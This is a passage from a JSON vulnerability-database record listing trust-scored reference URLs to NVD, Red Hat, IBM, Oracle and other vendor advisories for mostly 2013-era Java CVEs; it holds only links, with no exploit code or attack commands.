0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2445" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2443" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2461" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2468.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2464" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2412.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2463.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2446.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-1500.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2455.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2459.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2442.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2456.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2444.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2454.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2407.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2447.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2452.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2470.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2464.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-1571.html" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2448.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2466" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2465.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2472.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2466.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2471.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2453.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2473.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2437.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2469.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2451.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.5, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2450.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2457.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2469" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2468" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2443.html" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.oracle.com/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas36583326fc6c02fdf86257bc60079968c" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.xg7ek.jtfhr2..t.cytc.7%2a%2ak.bw89mq%5f%5fdeoifqd0" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-015/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001621" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640206" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21647053" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1019760" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100175056" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5094215" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644918" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21647384" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21643697" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650599" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004514" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659761" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21645500" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21648074" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21652561" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036927" }, { "trust": 0.3, "url": "http://www.ubuntu.com/usn/usn-1908-1/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21663487" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21663199" }, { "trust": 0.3, "url": "http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.3, "url": "https://access.redhat.com/knowledge/articles/11258" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-3743.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2470" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2471" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-3744.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2458" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2460.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2400" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2449" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2449.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2460" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2400.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2462.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2458.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2462" }, { "trust": 0.2, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2445.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2461.html" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2473" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2472" }, { "trust": 0.1, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0864" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1717" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1716" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0505" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2419" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5804" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5806" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5087" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0865" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4471" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5075" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3557" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2426" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4002" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5084" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1711" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1478" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5820" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4540" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0441" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5823" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0870" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3554" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0862" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1713" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0706" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0434" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5784" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5830" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5800" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5803" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5086" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3556" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0425" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2383" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2447" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2445" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5778" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5780" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5073" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5069" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-5035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3541" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3549" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1500" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3571" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0426" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5850" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3552" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-1876" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2384" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3521" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5085" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2407" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2421" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5068" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5071" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0815" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1475" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0497" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5774" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5782" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1725" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5790" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5805" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5802" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0442" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5825" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0506" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1484" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2430" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3541" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0872" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1718" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5772" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0433" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5074" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5072" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2436" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0822" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1537" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3553" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0025" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0169" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5077" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0435" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3544" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1723" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1726" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1571" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5081" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5840" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2473" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6629" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5783" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3560" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1480" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0501" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0869" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2417" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2471" }, { "trust": 0.1, "url": 